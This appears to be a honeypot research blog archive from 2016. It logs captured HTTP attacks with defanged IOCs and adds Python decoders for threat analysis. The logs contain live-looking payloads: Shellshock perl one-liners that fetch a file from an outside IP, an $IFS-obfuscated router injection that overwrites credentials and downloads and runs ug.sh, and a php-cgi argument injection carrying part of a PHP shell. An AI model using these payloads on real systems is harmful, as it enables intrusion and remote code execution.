Good morning,
as you may have already found out, the posts on this blog have been getting fewer and fewer. This is because my two honeypots have had some issues.
The vservers will be going down soon. So no more analytics.
Thanks to Swen for having kept the German one running for so long. I am currently looking for cheap vservers around the world and talking to some people about funding the operating costs, until then....
This is the end
SendMeSpam
A honeypot written in Python. My own honeypot, my own opinions, research and statements.
Friday, 4 March 2016
Thursday, 11 February 2016
159.226.162.196 - #perl wget via 204.232.209.188
BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 109.234.106.8
Connection: Close
END OF DATA
The HTTP server returned 404 at the time of the investigation.
Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.
Disclaimer: This information is provided as-is and there is no guarantee that blocking an IP or domain reported in this overview will not adversely impact your business. Use all information provided at your own risk; the author disclaims all warranty and shall not be liable for any damage or impact caused.
159.226.162[.]196
204.232.209[.]188
Sunday, 7 February 2016
178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081
BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080
END OF DATA
The ug.sh script tries to download a binary file.
Judging by the xxd and strings output of that file, it looks like a DD-WRT firmware image.
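The request line above hides its commands behind `$IFS` (the shell's field separator, which expands to whitespace) and backslash escapes, so the URL as logged is hard to read. The following is an added example, not the honeypot's own code, that undoes that obfuscation and lists what the injected shell would actually run; the function names are mine, and the request line is copied from the capture above, including the stray `ÿ` after `chmod` exactly as the page shows it.

```python
"""Undo the $IFS obfuscation in a command-injection request line and list the
commands it would run on the router. Added example for this blog, not the
honeypot's own code; the function names are mine."""
import re
from urllib.parse import unquote

# Constructed sample: the request line captured on 6 February 2016, copied from
# the post above (the stray 'ÿ' after chmod is reproduced as the page shows it).
SAMPLE_REQUEST_LINE = (
    "GET /cgi-bin/;nvram$IFS\\set$IFS\\http_passwd;nvram$IFS\\set$IFS\\http_username;"
    "nvram$IFS\\commit;sleep$IFS ;cd$IFS\\/tmp;wget$IFS\\http:\\/\\/178.57.115.231:8081"
    "\\/h\\/wrt\\/ug.sh;chmod$IFSÿ$IFS\\/tmp/ug.sh;/bin/sh$IFS\\/tmp/ug.sh HTTP/1.0"
)

# $IFS (or ${IFS}) expands to whitespace, so it separates words without a literal
# space; the backslash after it ends the variable name ('$IFS\set' would otherwise
# be read as the variable $IFSset) and the shell drops it when it unescapes.
IFS_RE = re.compile(r"\$\{?IFS\}?")
ESCAPE_RE = re.compile(r"\\(.)")
URL_RE = re.compile(r"https?://[^\s;]+")


def request_target(line):
    """Target of a request line, tolerating embedded spaces and percent-encoding."""
    parts = line.split(" ")
    return unquote(" ".join(parts[1:-1]))


def deobfuscate(target):
    """Shell commands hidden after /cgi-bin/ once $IFS and escapes are resolved."""
    _, _, injected = target.partition("/cgi-bin/")
    text = IFS_RE.sub(" ", injected)
    text = ESCAPE_RE.sub(r"\1", text)      # \s -> s, \/ -> /
    return [c.strip() for c in text.split(";") if c.strip()]


def summarize(line):
    """Commands, nvram writes and download URLs of one injected request line."""
    cmds = deobfuscate(request_target(line))
    urls = []
    for c in cmds:
        for u in URL_RE.findall(c):
            if u not in urls:
                urls.append(u)
    return {
        "commands": cmds,
        "nvram_writes": [c for c in cmds if c.startswith("nvram set")],
        "urls": urls,
        # the dropper is executed right after it is fetched
        "runs_dropper": any(c.startswith(("/bin/sh ", "sh ")) for c in cmds),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REQUEST_LINE).items():
        print(key, value)
```

Resolved, the request tries to overwrite the router's web credentials in nvram, commits them, changes to /tmp, fetches ug.sh from 178.57.115.231:8081 and runs it with /bin/sh, which matches the dropper behaviour described above. The same decoder works on `${IFS}` variants, as the test below also checks.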
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Sunday, 24 January 2016
61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)
BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
END OF DATA
For more information see https://user-agents.me/crawler/whatweb048-dev
WhatWeb is a website fingerprinting scanner: it identifies the web technologies (CMS, frameworks, server software) running on a host, which is what this bare GET / probe is doing.
61.49.45[.]47
- Whois Data (TeamCymru)
- AS : 4808
- IP : 61.49.45.47
- BGP Prefix : 61.49.0.0/18
- CC : CN
- Registry : apnic
- Allocated : 2001-06-28
- AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: SANS Internet Storm Center
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/61.49.45.47
Thursday, 21 January 2016
213.136.72.84 - Shellshock perl via 204.232.209.188
BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 195.169.125.87
Connection: Close
END OF DATA
213.136.72[.]84
204.232.209[.]188
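Both this capture and the 11 February one carry the same Shellshock probe: the User-Agent begins with the bash function-definition prefix `() {`, so a CGI host that exported the header into the environment with a vulnerable bash would run the perl one-liner, which in turn tries six different downloaders for the same file. The following is an added example, not the honeypot's own code, that parses a raw request, flags any header carrying that prefix and extracts the payload URLs as defanged IOCs in the style of the lists on this blog. The raw request is reconstructed from the capture above (the blank line terminating the headers is assumed) and the function names are mine.

```python
"""Spot Shellshock probes in raw HTTP requests and list the payload URLs they fetch.

Added example for this blog (not the honeypot's own code). The raw request is
reconstructed from the capture above; the blank line ending the headers is assumed.
"""
import re

# Constructed sample: the 20 January 2016 capture, re-typed as a raw request.
SAMPLE_REQUEST = (
    "GET HTTP/1.1 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";"
    "system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; "
    "curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; "
    "fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; "
    "lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; "
    "GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; "
    "lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'\r\n"
    "Host: 195.169.125.87\r\n"
    "Connection: Close\r\n"
    "\r\n"
)

# The bash function-definition prefix that vulnerable bash parsed from any
# environment variable (CGI exports request headers as HTTP_* variables).
# Matched anywhere in the value, not only at the start, to catch padded variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
URL_RE = re.compile(r"https?://[^\s\"';)]+")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_request(raw):
    """Split a raw request into (request_line, {lower-cased header: value})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")   # first colon only: values may contain ':'
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_shellshock(raw):
    """One finding per header carrying the '() {' prefix, with the URLs its payload fetches."""
    _, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        if not SHELLSHOCK_RE.search(value):
            continue
        urls = []
        for url in URL_RE.findall(value):       # the six downloaders all pull the same file
            if url not in urls:
                urls.append(url)
        findings.append({"header": name, "urls": urls})
    return findings


def defang(host):
    """Write an IPv4 host the way the IOC lists on this blog do: 204.232.209[.]188."""
    if IPV4_RE.fullmatch(host):
        head, _, last = host.rpartition(".")
        return f"{head}[.]{last}"
    return host


def iocs(raw):
    """Defanged hosts of every payload URL found in the request."""
    out = []
    for finding in find_shellshock(raw):
        for url in finding["urls"]:
            host = re.match(r"https?://([^/:]+)", url).group(1)
            if defang(host) not in out:
                out.append(defang(host))
    return out


if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE_REQUEST):
        print(finding["header"], finding["urls"])
    print("IOCs:", iocs(SAMPLE_REQUEST))
```

Note that the check is applied to every header, not just User-Agent: any header a CGI server exports (Referer, Cookie, Host) is an equally good carrier for the prefix.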
92.45.197.218 - Zollard php execution
Sadly the request was too long to be fully logged by the fake HTTP server.
BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disabl
END OF DATA
Decoded, the POST request line is:
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
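The trick here is the php-cgi query-string argument injection (CVE-2012-1823): a query string with no `=` in it was passed to php-cgi as command-line arguments, so the `-d` options above override php.ini at request time, `-n` ignores php.ini altogether, and `auto_prepend_file=php://input` makes the interpreter execute the POST body, which is the `<?php echo "Zollard"; ...` shell shown above. The following is an added example, not the honeypot's own code, that reconstructs argv the way an unpatched php-cgi did and flags the directives that turn the request into code execution; the function names and the DANGEROUS table are mine, and the query string is the one from the capture, wrapped for readability.

```python
"""Decode a php-cgi argument-injection query string and flag the dangerous
directives. Added example for this blog, not the honeypot's own code; the
function names and the DANGEROUS table are mine."""
from urllib.parse import unquote

# Constructed sample: the query string of the 21 January 2016 request above,
# wrapped here only for readability.
SAMPLE_QUERY = (
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+"
    "%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E"
    "%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F"
    "%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65"
    "%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F"
    "%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66"
    "%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65"
    "%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"
)

# Directive values that turn a request into remote code execution (my selection).
DANGEROUS = {
    "allow_url_include": lambda v: v.lower() in ("on", "1"),
    "auto_prepend_file": lambda v: v.startswith("php://"),
    "auto_append_file": lambda v: v.startswith("php://"),
    "disable_functions": lambda v: v.strip('"') == "",
    "safe_mode": lambda v: v.lower() in ("off", "0"),
    "open_basedir": lambda v: v.lower() == "none",
}


def php_cgi_argv(query):
    """argv as an unpatched php-cgi built it: a query string with no literal '='
    is split on '+' and percent-decoded into command-line arguments."""
    if "=" in query:
        return []                   # ordinary form query, handed to the script instead
    return [unquote(a) for a in query.split("+") if a]


def ini_overrides(argv):
    """Map directive -> value from '-d' arguments; other arguments come back as flags."""
    overrides, flags = {}, []
    args = iter(argv)
    for a in args:
        if a == "-d":
            directive = next(args, "")
        elif a.startswith("-d"):    # '-dallow_url_include=on' form
            directive = a[2:]
        else:
            flags.append(a)
            continue
        key, _, value = directive.partition("=")
        overrides[key] = value
    return overrides, flags


def assess(query):
    """Decoded argv, the ini overrides it sets and which of them are dangerous."""
    argv = php_cgi_argv(query)
    overrides, flags = ini_overrides(argv)
    return {
        "argv": argv,
        "overrides": overrides,
        "flags": flags,
        "dangerous": [k for k, bad in DANGEROUS.items() if k in overrides and bad(overrides[k])],
        # with php://input prepended, the POST body ('<?php echo "Zollard"; ...') is run
        "body_executed": overrides.get("auto_prepend_file") == "php://input",
    }


if __name__ == "__main__":
    result = assess(SAMPLE_QUERY)
    print(" ".join(result["argv"]))
    print("dangerous:", result["dangerous"], "body executed:", result["body_executed"])
```

Joining the decoded argv with spaces reproduces the request line above exactly. A patched php-cgi (PHP 5.3.12 / 5.4.2 and later) no longer passes such query strings as arguments, so the same pattern on an up-to-date host is just scanner noise worth recording for its source IP.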
92.45.197[.]218
- Whois Data (TeamCymru)
- AS : 34984
- IP : 92.45.197.218
- BGP Prefix : 92.45.196.0/23
- CC : TR
- Registry : ripencc
- Allocated : 2007-12-17
- AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Wednesday, 13 January 2016
Scanners seen on January 14, 2016
- 185.130.5.207 - muieblackcat
- 37.142.32.222 - masscan/1.0
- 149.78.19.136 - masscan/1.0
- 195.169.125.87 - zgrab/0.x
- 185.130.5.235 - muieblackcat
185.130.5[.]207
37.142.32[.]222
149.78.19[.]136
195.169.125[.]87
185.130.5[.]235